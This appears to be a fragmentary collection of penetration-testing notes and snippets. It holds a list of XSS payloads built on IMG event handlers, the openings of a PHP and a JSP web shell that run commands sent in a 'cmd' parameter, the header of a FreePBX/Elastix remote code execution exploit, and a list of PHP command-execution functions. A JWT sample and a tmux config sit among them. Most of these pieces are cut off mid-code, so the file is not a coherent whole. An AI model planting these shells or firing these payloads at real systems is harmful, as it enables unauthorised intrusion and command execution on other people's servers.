- Recon
- Find vuln
- Exploit
- Document it
Unicornscans in cli, nmap in msfconsole to help store loot in database.
var url = "Hello World"; | |
var data = []; | |
for (var i = 0; i < url.length; i++){ | |
data.push(url.charCodeAt(i)); | |
} |
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E | |
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> |
<html> | |
<body> | |
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> | |
<input type="TEXT" name="cmd" autofocus id="cmd" size="80"> | |
<input type="SUBMIT" value="Execute"> | |
</form> | |
<pre> | |
<?php | |
if(isset($_GET['cmd'])) | |
{ |
<%@ page import="java.util.*,java.io.*"%> | |
<% | |
%> | |
<HTML><BODY> | |
Commands with JSP | |
<FORM METHOD="GET" NAME="myform" ACTION=""> | |
<INPUT TYPE="text" NAME="cmd"> | |
<INPUT TYPE="submit" VALUE="Send"> | |
</FORM> | |
<pre> |
#!/usr/bin/python | |
############################################################ | |
# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit | |
# Google Dork: oy vey | |
# Date: March 23rd, 2012 | |
# Author: muts | |
# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others. | |
# Tested on: multiple | |
# CVE : notyet | |
# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/ |
exec - Returns last line of commands output
passthru - Passes commands output directly to the browser
system - Passes commands output directly to the browser and returns last line
shell_exec - Returns commands output
\`\` (backticks) - Same as shell_exec()
popen - Opens read or write pipe to process of a command
proc_open - Similar to popen() but greater degree of control
pcntl_exec - Executes a program
Target: | |
{ | |
"alg": "HS256", | |
"typ": "JWT" | |
} | |
{ | |
"sub": "1234567890", | |
"name": "John Doe", | |
"iat": 1516239022 |
# create or add this to ur ~/.tmux.conf | |
#set prefix | |
set -g prefix C-a | |
bind C-a send-prefix | |
unbind C-b | |
set -g history-limit 100000 | |
set -g allow-rename off |